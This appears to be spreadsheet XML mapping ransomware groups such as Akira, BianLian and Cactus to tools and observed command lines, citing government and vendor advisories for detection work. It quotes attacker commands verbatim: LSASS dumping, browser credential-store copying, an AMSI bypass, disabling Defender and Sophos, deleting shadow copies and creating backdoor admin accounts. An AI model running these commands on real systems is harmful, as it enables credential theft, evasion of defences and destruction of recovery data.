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F9E5BB42-A99E-2B49-9645-DDAC889DE700}" xr6:coauthVersionLast="47" xr6:coauthVersionMax="47" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/>
  <bookViews>
    <workbookView xWindow="140" yWindow="-21100" windowWidth="38280" windowHeight="21100" activeTab="1" xr2:uid="{2B361B8B-B20C-1B4A-9CA2-9DEA1E5C6017}"/>
  </bookViews>
  <sheets>
    <sheet name="sheet1" sheetId="1" r:id="rId1"/>
    <sheet name="Sheet2" sheetId="2" r:id="rId2"/>
  </sheets>
  <calcPr calcId="191029"/>
  <pivotCaches>
    <pivotCache cacheId="79"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<sst xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" count="860" uniqueCount="425">
  <si>
    <t>eid</t>
  </si>
  <si>
    <t>map_pid</t>
  </si>
  <si>
    <t>description</t>
  </si>
  <si>
    <t>evidence</t>
  </si>
  <si>
    <t>ns_meta</t>
  </si>
  <si>
    <t>eid_type</t>
  </si>
  <si>
    <t>play-eid0001</t>
  </si>
  <si>
    <t>Distribute EXE Via GPO</t>
  </si>
  <si>
    <t>{ "data": "2023-12", "url": "https://www.cisa.gov/sites/default/files/2023-12/aa23-352a-stopransomware-play-ransomware.pdf", "tags": ["Play"]}</t>
  </si>
  <si>
    <t>play-eid0002</t>
  </si>
  <si>
    <t>htool</t>
  </si>
  <si>
    <t>MimiKatz</t>
  </si>
  <si>
    <t>play-eid0003</t>
  </si>
  <si>
    <t>Gmer</t>
  </si>
  <si>
    <t>play-eid0004</t>
  </si>
  <si>
    <t>IOBit</t>
  </si>
  <si>
    <t>play-eid0005</t>
  </si>
  <si>
    <t>PowerTool</t>
  </si>
  <si>
    <t>play-eid0006</t>
  </si>
  <si>
    <t>Grixba</t>
  </si>
  <si>
    <t>play-eid0007</t>
  </si>
  <si>
    <t>ProcessHacker</t>
  </si>
  <si>
    <t>play-eid0008</t>
  </si>
  <si>
    <t>Plink</t>
  </si>
  <si>
    <t>play-eid0009</t>
  </si>
  <si>
    <t>Nltest</t>
  </si>
  <si>
    <t>play-eid0010</t>
  </si>
  <si>
    <t>WInPEAS</t>
  </si>
  <si>
    <t>play-eid0011</t>
  </si>
  <si>
    <t>WinSCP</t>
  </si>
  <si>
    <t>play-eid0012</t>
  </si>
  <si>
    <t>WinRAR</t>
  </si>
  <si>
    <t>play-eid0013</t>
  </si>
  <si>
    <t>Nekto - PriviCMD</t>
  </si>
  <si>
    <t>play-eid0014</t>
  </si>
  <si>
    <t>c2</t>
  </si>
  <si>
    <t>Cobalt Strike</t>
  </si>
  <si>
    <t>play-eid0015</t>
  </si>
  <si>
    <t>PsExec</t>
  </si>
  <si>
    <t>play-eid0016</t>
  </si>
  <si>
    <t>AdFind</t>
  </si>
  <si>
    <t>play-eid0017</t>
  </si>
  <si>
    <t>Bloodhound</t>
  </si>
  <si>
    <t>play-eid0018</t>
  </si>
  <si>
    <t>GMER</t>
  </si>
  <si>
    <t>play-eid0019</t>
  </si>
  <si>
    <t>A .play extension</t>
  </si>
  <si>
    <t>generic</t>
  </si>
  <si>
    <t>ghost-eid0001</t>
  </si>
  <si>
    <t>ghost-eid0002</t>
  </si>
  <si>
    <t>ghost-eid0003</t>
  </si>
  <si>
    <t>ghost-eid0004</t>
  </si>
  <si>
    <t>SharpZeroLogon.exe</t>
  </si>
  <si>
    <t>ghost-eid0005</t>
  </si>
  <si>
    <t>powershell -nop -w hidden -encodedcommand JABzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACIA…</t>
  </si>
  <si>
    <t>ghost-eid0006</t>
  </si>
  <si>
    <t>$s=New-Object IO.MemoryStream(,[Convert]::FromBase64String(“</t>
  </si>
  <si>
    <t>ghost-eid0007</t>
  </si>
  <si>
    <t>mega.nz</t>
  </si>
  <si>
    <t>ghost-eid0008</t>
  </si>
  <si>
    <t>For example, http://xxx.xxx.xxx.xxx:80/Google.com where xxx.xxx.xxx.xxx represents the C2 server’s IP address. Cobalt Strike</t>
  </si>
  <si>
    <t>ghost-eid0009</t>
  </si>
  <si>
    <t>SharpGPPPass.exe</t>
  </si>
  <si>
    <t>ghost-eid0010</t>
  </si>
  <si>
    <t>SpnDump.exe</t>
  </si>
  <si>
    <t>ghost-eid0011</t>
  </si>
  <si>
    <t>github[.]com/BronzeTicket/SharpNBTScan - nbt.exe</t>
  </si>
  <si>
    <t>A compiled version of SharpNBTScan,
a NetBIOS scanner. Ghost actors use
this tool for hostname and IP address
enumeration.</t>
  </si>
  <si>
    <t>ghost-eid0012</t>
  </si>
  <si>
    <t>BadPotato.exe</t>
  </si>
  <si>
    <t>ghost-eid0013</t>
  </si>
  <si>
    <t>God.exe - github[.]com/BeichenDream/GodPotato</t>
  </si>
  <si>
    <t>God.exe is a compiled version of
GodPotato and is used for privilege
escalation.</t>
  </si>
  <si>
    <t>Set-MpPreference -DisableRealtimeMonitoring 1 -DisableIntrusionPreventionSystem 1 -DisableBehaviorMonitoring 1 -DisableScriptScanning 1 -DisableIOAVProtection 1 -EnableControlledFolderAccess Disabled -MAPSReporting Disabled -SubmitSamplesConsent NeverSend.</t>
  </si>
  <si>
    <t>cmdline</t>
  </si>
  <si>
    <t>SharpShares</t>
  </si>
  <si>
    <t>{ "data": "2025-02", "url": "https://www.cisa.gov/sites/default/files/2025-02/aa25-050a-stopransomware-ghost-cring-ransomware.pdf", "tags": ["Ghost"]}</t>
  </si>
  <si>
    <t>akira-eid0001</t>
  </si>
  <si>
    <t>Encrypted files are appended with either a .akira or .powerranges extension.</t>
  </si>
  <si>
    <t>akira-eid0002</t>
  </si>
  <si>
    <t>tool</t>
  </si>
  <si>
    <t>Adfind</t>
  </si>
  <si>
    <t>akira-eid0003</t>
  </si>
  <si>
    <t>Advanced IP Scanner</t>
  </si>
  <si>
    <t>akira-eid0004</t>
  </si>
  <si>
    <t>AnyDesk</t>
  </si>
  <si>
    <t>akira-eid0005</t>
  </si>
  <si>
    <t>LaZagne</t>
  </si>
  <si>
    <t>akira-eid0006</t>
  </si>
  <si>
    <t>PCHunter64</t>
  </si>
  <si>
    <t>akira-eid0007</t>
  </si>
  <si>
    <t>akira-eid0008</t>
  </si>
  <si>
    <t>Ngrok</t>
  </si>
  <si>
    <t>akira-eid0009</t>
  </si>
  <si>
    <t>Rclone</t>
  </si>
  <si>
    <t>akira-eid0010</t>
  </si>
  <si>
    <t>SoftPerfect</t>
  </si>
  <si>
    <t>akira-eid0011</t>
  </si>
  <si>
    <t>akira-eid0012</t>
  </si>
  <si>
    <t xml:space="preserve">nltest /dclist: </t>
  </si>
  <si>
    <t>akira-eid0013</t>
  </si>
  <si>
    <t>nltest /DOMAIN_TRUSTS</t>
  </si>
  <si>
    <t>akira-eid0014</t>
  </si>
  <si>
    <t>net group “Domain admins” /dom</t>
  </si>
  <si>
    <t>akira-eid0015</t>
  </si>
  <si>
    <t xml:space="preserve">net localgroup “Administrators” /dom </t>
  </si>
  <si>
    <t>akira-eid0016</t>
  </si>
  <si>
    <t>tasklist</t>
  </si>
  <si>
    <t>akira-eid0017</t>
  </si>
  <si>
    <t>rundll32.exe c:\Windows\System32\comsvcs.dll, MiniDump ((Get-Process lsass).Id) C:\windows\temp\lsass.dmp full</t>
  </si>
  <si>
    <t>akira-eid0018</t>
  </si>
  <si>
    <t xml:space="preserve">cmd.exe /Q /c esentutl.exe /y "C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.defaultrelease\key4.db" /d "C:\Users\&lt;username&gt;\AppData\Roaming\Mozilla\Firefox\Profiles\&lt;firefox_profile_id&gt;.defaultrelease\key4.db.tmp” </t>
  </si>
  <si>
    <t>akira-eid0019</t>
  </si>
  <si>
    <t>cmd.exe /Q /c esentutl.exe /y "C:\Users\&lt;username&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data" /d "C:\Users\&lt;username&gt;\AppData\Local\Google\Chrome\User Data\Default\Login Data.tmp”</t>
  </si>
  <si>
    <t>akira-eid0020</t>
  </si>
  <si>
    <t>powershell.exe -Command "Get-WmiObject Win32_Shadowcopy | Remove-WmiObject</t>
  </si>
  <si>
    <t>akira-eid0021</t>
  </si>
  <si>
    <t>CloudZilla</t>
  </si>
  <si>
    <t>{ "data": "2024-08", "url": "https://www.cisa.gov/sites/default/files/2024-04/aa24-109a-stopransomware-akira-ransomware_2.pdf", "tags": ["Akira"]}</t>
  </si>
  <si>
    <t>bianlian-eid0001</t>
  </si>
  <si>
    <t>ProxyShell Exloit  (CVE-2021-34473, CVE-2021-34523, and CVE2021-31207)</t>
  </si>
  <si>
    <t>bianlian-eid0002</t>
  </si>
  <si>
    <t>bianlian-eid0003</t>
  </si>
  <si>
    <t>Rsocks SOCKS5</t>
  </si>
  <si>
    <t>bianlian-eid0004</t>
  </si>
  <si>
    <t>Softperfect Netscan</t>
  </si>
  <si>
    <t>bianlian-eid0005</t>
  </si>
  <si>
    <t>Advanced Port Scanner</t>
  </si>
  <si>
    <t>bianlian-eid0006</t>
  </si>
  <si>
    <t>bianlian-eid0007</t>
  </si>
  <si>
    <t>PingCastle</t>
  </si>
  <si>
    <t>bianlian-eid0008</t>
  </si>
  <si>
    <t>Impacket</t>
  </si>
  <si>
    <t>bianlian-eid0009</t>
  </si>
  <si>
    <t>mega</t>
  </si>
  <si>
    <t>bianlian-eid0010</t>
  </si>
  <si>
    <t>[Ref].Assembly.GetType(‘System.Management.Automation.AmsiUtils’).GetField(‘amsiInitFailed’,’NonPublic,* Static’).SetValue($null,$true)</t>
  </si>
  <si>
    <t>bianlian-eid0011</t>
  </si>
  <si>
    <t>cmd.exe /Q /c for /f “tokens=1,2 delims= “^%A in (‘”tasklist /fi “Imagename eq lsass.exe” | find “lsass””’) do rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump ^%B \Windows\Temp\&lt;file&gt;.csv full</t>
  </si>
  <si>
    <t>bianlian-eid0012</t>
  </si>
  <si>
    <t>cmd.exe /Q /c net user &lt;admin&gt; /active:yes 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>bianlian-eid0013</t>
  </si>
  <si>
    <t>cmd.exe /Q /c net user "&lt;admin&gt;"&lt;password&gt; 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>bianlian-eid0014</t>
  </si>
  <si>
    <t>cmd.exe /Q /c quser 1&gt; \\127.0.0.1\C$\Windows\Temp\&lt;folder&gt; 2&gt;&amp;1</t>
  </si>
  <si>
    <t>bianlian-eid0015</t>
  </si>
  <si>
    <t>dism.exe /online /Disable-Feature /FeatureName:Windows-Defender /Remove /NoRestart</t>
  </si>
  <si>
    <t>bianlian-eid0016</t>
  </si>
  <si>
    <t>dump.exe -no-pass -just-dc user.local/&lt;fileserver.local&gt;\@&lt;local_ip&gt;</t>
  </si>
  <si>
    <t>bianlian-eid0017</t>
  </si>
  <si>
    <t>exp.exe -n &lt;fileserver.local&gt; -t &lt;local_ip&gt;</t>
  </si>
  <si>
    <t>bianlian-eid0018</t>
  </si>
  <si>
    <t>findstr /spin "password" *.* &gt;C:\Users\training\Music\&lt;file&gt;.txt</t>
  </si>
  <si>
    <t>bianlian-eid0019</t>
  </si>
  <si>
    <t xml:space="preserve">ldap.exe -u user\&lt;user&gt; -p &lt;password&gt; ldap://&lt;local_ip&gt; </t>
  </si>
  <si>
    <t>bianlian-eid0020</t>
  </si>
  <si>
    <t>logoff</t>
  </si>
  <si>
    <t>bianlian-eid0021</t>
  </si>
  <si>
    <t>mstsc</t>
  </si>
  <si>
    <t>bianlian-eid0022</t>
  </si>
  <si>
    <t>net group /domain</t>
  </si>
  <si>
    <t>bianlian-eid0023</t>
  </si>
  <si>
    <t>net group 'Domain Admins' /domain</t>
  </si>
  <si>
    <t>bianlian-eid0024</t>
  </si>
  <si>
    <t>net group 'Domain Computers' /domain</t>
  </si>
  <si>
    <t>bianlian-eid0025</t>
  </si>
  <si>
    <t xml:space="preserve">net user /domain </t>
  </si>
  <si>
    <t>bianlian-eid0026</t>
  </si>
  <si>
    <t>net.exe localgroup "Remote Desktop Users" &lt;user&gt; /add</t>
  </si>
  <si>
    <t>bianlian-eid0027</t>
  </si>
  <si>
    <t>net.exe user &lt;admin&gt; &lt;password&gt; /domain</t>
  </si>
  <si>
    <t>bianlian-eid0028</t>
  </si>
  <si>
    <t>netsh.exe advfirewall firewall add rule "name=allow RemoteDesktop" dir=in * protocol=TCP localport=&lt;port num&gt; action=allow</t>
  </si>
  <si>
    <t>bianlian-eid0029</t>
  </si>
  <si>
    <t>netsh.exe advfirewall firewall set rule "group=remote desktop" new enable=Yes</t>
  </si>
  <si>
    <t>bianlian-eid0030</t>
  </si>
  <si>
    <t>nltest /dclist</t>
  </si>
  <si>
    <t>bianlian-eid0031</t>
  </si>
  <si>
    <t>nltest /domain_trusts</t>
  </si>
  <si>
    <t>bianlian-eid0032</t>
  </si>
  <si>
    <t>ping.exe -4 -n 1 *</t>
  </si>
  <si>
    <t>bianlian-eid0033</t>
  </si>
  <si>
    <t xml:space="preserve">quser; ([adsisearcher]"(ObjectClass=computer)").Find All().count;([adsisearcher]"(ObjectClass=user)").FindAll().count;[Security.Principal.WindowsIdentity]::GetCurrent() | select name;net user"$env:USERNAME" /domain; (Get-WmiObject -class Win32_OperatingSystem).Caption; GetWmiObject -Namespace root\cimv2 -Class Win32_ComputerSystem; net group "domain admins" /domain; nltest /dclist:; nltest /DOMAIN_TRUSTS </t>
  </si>
  <si>
    <t>bianlian-eid0034</t>
  </si>
  <si>
    <t>reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal *Server\WinStations\RDP-Tcp" /v UserAuthentication /t REG_DWORD /d 0 /f</t>
  </si>
  <si>
    <t>bianlian-eid0035</t>
  </si>
  <si>
    <t>bianlian-eid0036</t>
  </si>
  <si>
    <t xml:space="preserve">reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint *Defense\TamperProtection\Config" /t REG_DWORD /v SAVEnabled /d 0 /f </t>
  </si>
  <si>
    <t>bianlian-eid0037</t>
  </si>
  <si>
    <t xml:space="preserve">reg.exe add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Sophos Endpoint *Defense\TamperProtection\Config" /t REG_DWORD /v SEDEnabled /d 0 /f </t>
  </si>
  <si>
    <t>bianlian-eid0038</t>
  </si>
  <si>
    <t>reg.exe ADD *HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Sophos\SAVService\TamperProtection /t REG_DWORD /v Enabled /d 0 /f</t>
  </si>
  <si>
    <t>bianlian-eid0039</t>
  </si>
  <si>
    <t>reg.exe copy hklm\system\CurrentControlSet\services\tvnserver *hklm\system\CurrentControlSet\control\safeboot\network\tvnserver /s /f</t>
  </si>
  <si>
    <t>bianlian-eid0040</t>
  </si>
  <si>
    <t>s.exe /threads:50 /ldap:all /verbose /outfile:c:\users\&lt;user&gt;\desktop\1.txt</t>
  </si>
  <si>
    <t>bianlian-eid0041</t>
  </si>
  <si>
    <t>schtasks.exe /RU SYSTEM /create /sc ONCE /&lt;user&gt; /tr "cmd.exe /crundll32.exe c:\programdata\netsh.dll,Entry" /ST 04:43</t>
  </si>
  <si>
    <t>bianlian-eid0042</t>
  </si>
  <si>
    <t>start-process PowerShell.exe -arg C:\Users\Public\Music\&lt;file&gt;.ps1 -WindowStyle Hidden</t>
  </si>
  <si>
    <t>exploit</t>
  </si>
  <si>
    <t>{ "data": "2024-11", "url": "https://www.cisa.gov/sites/default/files/2024-11/aa23-136a-joint-csa-stopransomware-bianlian-ransomware-group.pdf", "tags": ["bian lian"]}</t>
  </si>
  <si>
    <t>blackbasta-eid0001</t>
  </si>
  <si>
    <t>SoftPerfect NetScan</t>
  </si>
  <si>
    <t xml:space="preserve">A network scanner (netscan.exe) used to ping computers, scan ports,
discover shared folders, and retrieve information about network devices
via Windows Management Instrumentation (WMI), Simple Network
Management Protocol (SNMP), HTTP, Secure Shell (SSH) and PowerShell. It
also scans for remote services, registry, files, and performance counters. </t>
  </si>
  <si>
    <t>blackbasta-eid0002</t>
  </si>
  <si>
    <t xml:space="preserve">Black Basta affiliates have used the vssadmin.exe program to delete shadow copies. </t>
  </si>
  <si>
    <t>blackbasta-eid0003</t>
  </si>
  <si>
    <t>Black Basta affiliates have used PowerShell to disable antivirus products.</t>
  </si>
  <si>
    <t>blackbasta-eid0004</t>
  </si>
  <si>
    <t>Black Basta affiliates have used social engineering techniques to convince users to execute legitimate remote access tools such as AnyDesk and Microsoft’s Quick Assist</t>
  </si>
  <si>
    <t>blackbasta-eid0005</t>
  </si>
  <si>
    <t>blackbasta-eid0006</t>
  </si>
  <si>
    <t>Black Basta affiliates have deployed a tool called Backstab to disable endpoint detection and response (EDR) tooling.</t>
  </si>
  <si>
    <t>blackbasta-eid0007</t>
  </si>
  <si>
    <t>backstab</t>
  </si>
  <si>
    <t>blackbasta-eid0008</t>
  </si>
  <si>
    <t>Mimikatz</t>
  </si>
  <si>
    <t>blackbasta-eid0009</t>
  </si>
  <si>
    <t>Black Basta affiliates have used credential scraping tools like Mimikatz, Zerologon, NoPac and PrintNightmare for privilege escalation.</t>
  </si>
  <si>
    <t>blackbasta-eid0010</t>
  </si>
  <si>
    <t>WInSCP</t>
  </si>
  <si>
    <t>Windows Secure Copy is a free and open source SSH File Transfer
Protocol, File Transfer Protocol, WebDAV, Amazon S3, and secure copy
protocol client. Black Basta affiliates have used it to transfer data from a
compromised network to actor-controlled accounts.</t>
  </si>
  <si>
    <t>blackbasta-eid0011</t>
  </si>
  <si>
    <t>Splashtop</t>
  </si>
  <si>
    <t>Remote desktop software that allows remote access to devices for
support, access, and collaboration.</t>
  </si>
  <si>
    <t>blackbasta-eid0012</t>
  </si>
  <si>
    <t>ScreenConnect</t>
  </si>
  <si>
    <t>Remote support, access, and meeting software that allows users to control
devices remotely over the internet.</t>
  </si>
  <si>
    <t>blackbasta-eid0013</t>
  </si>
  <si>
    <t>A command line program used to sync files with cloud storage services
such as Mega.</t>
  </si>
  <si>
    <t>blackbasta-eid0014</t>
  </si>
  <si>
    <t>Powershell</t>
  </si>
  <si>
    <t>A cross-platform task automation solution made up of a command-line
shell, a scripting language, and a configuration management framework,
which runs on Windows, Linux, and macOS.</t>
  </si>
  <si>
    <t>blackbasta-eid0015</t>
  </si>
  <si>
    <t>PSExec</t>
  </si>
  <si>
    <t>A tool designed to run programs and execute commands on remote
systems.</t>
  </si>
  <si>
    <t>blackbasta-eid0016</t>
  </si>
  <si>
    <t>A tool that allows users to view and save authentication credentials such
as Kerberos tickets. Black Basta affiliates have used it to aid in privilege
escalation.</t>
  </si>
  <si>
    <t>blackbasta-eid0017</t>
  </si>
  <si>
    <t>A penetration testing tool used by security professions to test the security
of networks and systems. Black Basta affiliates have used it to assist with
lateral movement and file execution.</t>
  </si>
  <si>
    <t>blackbasta-eid0018</t>
  </si>
  <si>
    <t>BITSAdmin</t>
  </si>
  <si>
    <t>A command-line utility that manages downloads/uploads between a client
and server by using the Background Intelligent Transfer Service (BITS) to
perform asynchronous file transfers.</t>
  </si>
  <si>
    <t>blackbasta-eid0019</t>
  </si>
  <si>
    <t>Anydesk</t>
  </si>
  <si>
    <t>A remote monitoring and management tool used by Black Basta affiliates
to gain access to a victim user’s endpoint.</t>
  </si>
  <si>
    <t xml:space="preserve"> .basta or otherwise random file extension is added to file names and a ransom note titled readme.txt is left on the compromised system</t>
  </si>
  <si>
    <t>blackbasta-eid0020</t>
  </si>
  <si>
    <t>cactus-eid0001</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</si>
  <si>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</si>
  <si>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cactus-eid0002</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</si>
  <si>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</si>
  <si>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cactus-eid0003</t>
  </si>
  <si>
    <t>TASKKILL /F /IM msiexec.exe
msiexec.exe /x {3E8909A1-55FD-46C4-8FC0-604313331AA2} /QN /norestart
msiexec.exe /x {36E5BC45-019B-49A5-A722-E64FF83AE375} /QN /norestart
msiexec.exe /x {9B5749A2-35AE-435C-BF34-51884160AB09} /QN /norestart
&lt;…snip…&gt;
c:\windows\BEST_uninstallTool.exe /bdparams
del "%~f0"</t>
  </si>
  <si>
    <t>cactus-eid0004</t>
  </si>
  <si>
    <t>net user Adm1nBac P@ssW0dDP@ssW /add</t>
  </si>
  <si>
    <t>cactus-eid0005</t>
  </si>
  <si>
    <t>net user Adm1nBac /active:yes</t>
  </si>
  <si>
    <t>cactus-eid0006</t>
  </si>
  <si>
    <t>net localgroup Administrators Adm1nBac /add</t>
  </si>
  <si>
    <t>cactus-eid0007</t>
  </si>
  <si>
    <t>bcdedit /set {default} safeboot minimal</t>
  </si>
  <si>
    <t>cactus-eid0008</t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeText /t REG_SZ /d "" /f</t>
  </si>
  <si>
    <t>cactus-eid0009</t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" /v LegalNoticeCaption /t REG_SZ /d "" /f</t>
  </si>
  <si>
    <t>cactus-eid0010</t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeText /t REG_SZ /d "" /f</t>
  </si>
  <si>
    <t>cactus-eid0011</t>
  </si>
  <si>
    <t>reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v LegalNoticeCaption /t REG_SZ /d "" /f</t>
  </si>
  <si>
    <t>cactus-eid0012</t>
  </si>
  <si>
    <t>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoAdminLogon /t REG_SZ /d 1 /f</t>
  </si>
  <si>
    <t>cactus-eid0013</t>
  </si>
  <si>
    <t>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultUserName /t REG_SZ /d Adm1nBac /f</t>
  </si>
  <si>
    <t>cactus-eid0014</t>
  </si>
  <si>
    <t>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v DefaultPassword /t REG_SZ /d P@ssW0dDP@ssW /f</t>
  </si>
  <si>
    <t>cactus-eid0015</t>
  </si>
  <si>
    <t>reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v AutoLogonCount /t REG_DWORD /d 1 /f</t>
  </si>
  <si>
    <t>cactus-eid0016</t>
  </si>
  <si>
    <t>reg add "HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce" /v "*!test" /t REG_SZ /d "C:\windows\f2.bat" /f</t>
  </si>
  <si>
    <t>cactus-eid0017</t>
  </si>
  <si>
    <t>powershell.exe -ex bypass -nop -file totalexec.ps1 -CMD c:\windows\f1.bat -ACC .\admin1234 -SECR Pa$$w0rd12321 -EXE f1.bat,f2.bat,.7z,7.exe -LIST ips.txt -JOBS 10 -CHUNK 10 -WAIT 5</t>
  </si>
  <si>
    <t>{ "data": "2023-05", "url": "https://www.kroll.com/en/insights/publications/cyber/cactus-ransomware-prickly-new-variant-evades-detection", "tags": ["CACTUS"]}</t>
  </si>
  <si>
    <t>cactus-eid0018</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</si>
  <si>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</si>
  <si>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cactus-eid0019</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</si>
  <si>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</si>
  <si>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script</t>
  </si>
  <si>
    <t>eightb-eid0001</t>
  </si>
  <si>
    <t xml:space="preserve">.8base </t>
  </si>
  <si>
    <t>file extension</t>
  </si>
  <si>
    <t>eightb-eid0002</t>
  </si>
  <si>
    <t>%AppData%\Local\{malware} %ProgramData%\Microsoft\Windows\Start Menu\Programs\Startup\{malware} %AppData%\Roaming\Microsoft\Start Menu\Programs\Startup\{malware}</t>
  </si>
  <si>
    <t>eightb-eid0003</t>
  </si>
  <si>
    <t>WNetEnumResource()</t>
  </si>
  <si>
    <t>eightb-eid0004</t>
  </si>
  <si>
    <t>wmic shadowcopy delete</t>
  </si>
  <si>
    <t>eightb-eid0005</t>
  </si>
  <si>
    <t>wbadmin delete catalog -quiet</t>
  </si>
  <si>
    <t>eightb-eid0006</t>
  </si>
  <si>
    <t>vssadmin delete shadows /all /quiet</t>
  </si>
  <si>
    <t>eightb-eid0007</t>
  </si>
  <si>
    <t>bcdedit /set {default} recoveryenabled no</t>
  </si>
  <si>
    <t>eightb-eid0008</t>
  </si>
  <si>
    <t>bcdedit /set {default} bootstatuspolicy ignoreallfailures</t>
  </si>
  <si>
    <t>file_path</t>
  </si>
  <si>
    <t>phobos-eid00001</t>
  </si>
  <si>
    <t>Bloodhound - Sharphound</t>
  </si>
  <si>
    <t>phobos-eid00002</t>
  </si>
  <si>
    <t>Nirsoft</t>
  </si>
  <si>
    <t>phobos-eid00003</t>
  </si>
  <si>
    <t>Passview</t>
  </si>
  <si>
    <t>phobos-eid00004</t>
  </si>
  <si>
    <t>phobos-eid00005</t>
  </si>
  <si>
    <t>phobos-eid00006</t>
  </si>
  <si>
    <t xml:space="preserve">PowerTool </t>
  </si>
  <si>
    <t>phobos-eid00007</t>
  </si>
  <si>
    <t>Universal Virus Sniffer</t>
  </si>
  <si>
    <t>phobos-eid00008</t>
  </si>
  <si>
    <t xml:space="preserve">MSHTA execute files </t>
  </si>
  <si>
    <t>phobos-eid00009</t>
  </si>
  <si>
    <t>mshta C:\info.hta</t>
  </si>
  <si>
    <t>phobos-eid00010</t>
  </si>
  <si>
    <t>mshta C:\%PUBLIC%\Desktop\info.hta</t>
  </si>
  <si>
    <t>phobos-eid00011</t>
  </si>
  <si>
    <t>mshta C:\%USERPROFILE%\Desktop\info.hta</t>
  </si>
  <si>
    <t>phobos-eid00012</t>
  </si>
  <si>
    <t>phobos-eid00013</t>
  </si>
  <si>
    <t>phobos-eid00014</t>
  </si>
  <si>
    <t>phobos-eid00015</t>
  </si>
  <si>
    <t>netsh firewall set opmode mode=disable</t>
  </si>
  <si>
    <t>phobos-eid00016</t>
  </si>
  <si>
    <t>phobos-eid00017</t>
  </si>
  <si>
    <t>netsh advfirewall set currentprofile state off</t>
  </si>
  <si>
    <t>phobos-eid00018</t>
  </si>
  <si>
    <t xml:space="preserve">vssadmin delete shadows /all /quiet </t>
  </si>
  <si>
    <t>{ "data": "2024-02", "url": "https://www.cisa.gov/sites/default/files/2024-02/aa24-060a-stopransomware-phobos-ransomware_1.pdf", "tags": ["Phobos"]}</t>
  </si>
  <si>
    <t>royal-eid0001</t>
  </si>
  <si>
    <t>Nsudo Tool</t>
  </si>
  <si>
    <t>royal-eid0002</t>
  </si>
  <si>
    <t>nircmd elevatecmd exec hide "requestadmin.bat"</t>
  </si>
  <si>
    <t>royal-eid0003</t>
  </si>
  <si>
    <t>Nsudo file drop
Nsudo runtime
Nsudo AV tampering commandline
Ransom:Win32/BlackCat!MSR
Ransom:Win32/BlackCat.MK!MTB
Ransom:Linux/BlackCat.A!MTB</t>
  </si>
  <si>
    <t>royal-eid0004</t>
  </si>
  <si>
    <t>Trojan:Win32/Gozi
Trojan:Win64/Gozi
VirTool:Win32/CobaltStrike
VirTool:Win64/CobaltStrike
Behavior:Win64/CobaltStrike
Trojan:Win32/VidarStealer</t>
  </si>
  <si>
    <t>royal-eid0005</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</si>
  <si>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</si>
  <si>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royal-eid0006</t>
  </si>
  <si>
    <t>Encrypts files and appends ".royal or
".royal_w" extensions to filenames</t>
  </si>
  <si>
    <t>royal-eid0007</t>
  </si>
  <si>
    <t>Written in C++ &amp; targets windows</t>
  </si>
  <si>
    <t>royal-eid0008</t>
  </si>
  <si>
    <t>royal-eid0009</t>
  </si>
  <si>
    <t>adfind</t>
  </si>
  <si>
    <t>royal-eid0010</t>
  </si>
  <si>
    <t>royal-eid0011</t>
  </si>
  <si>
    <t>\\&lt;IP_Address&gt;\ADMIN$” or “\\&lt;IP_Address&gt;\IPC$</t>
  </si>
  <si>
    <t>royal-eid0012</t>
  </si>
  <si>
    <t>netscan</t>
  </si>
  <si>
    <t>royal-eid0013</t>
  </si>
  <si>
    <t>mdeav_alerts</t>
  </si>
  <si>
    <t>mdeedr_alerts</t>
  </si>
  <si>
    <t>{ "data": "2023-11", "url": "https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/", "tags": ["royal", "DEV-0569"]}</t>
  </si>
  <si>
    <t>{ "data": "2023-01", "url": "https://www.hhs.gov/sites/default/files/royal-blackcat-ransomware-tlpclear.pdf", "tags": ["royal"]}</t>
  </si>
  <si>
    <t>ransomhub-eid0001</t>
  </si>
  <si>
    <t xml:space="preserve">mimikatz </t>
  </si>
  <si>
    <t>A tool that allows users to view and save authentication credentials
such as Kerberos tickets. RansomHub affiliates have used it to aid
privilege escalation.</t>
  </si>
  <si>
    <t>{ "data": "2024-08-29", "url": "https://www.cisa.gov/sites/default/files/2024-09/aa24-242a-stopransomware-ransomhub-ransomware_1.pdf", "tags": ["RansomHub"]}</t>
  </si>
  <si>
    <t>ransomhub-eid0002</t>
  </si>
  <si>
    <t>anydesk</t>
  </si>
  <si>
    <t>ransomhub-eid0003</t>
  </si>
  <si>
    <t>connectwise</t>
  </si>
  <si>
    <t>ransomhub-eid0004</t>
  </si>
  <si>
    <t>ransomhub-eid0005</t>
  </si>
  <si>
    <t>N-Able</t>
  </si>
  <si>
    <t>ransomhub-eid0006</t>
  </si>
  <si>
    <t>A command line program used to sync files with cloud storage
services.</t>
  </si>
  <si>
    <t>ransomhub-eid0007</t>
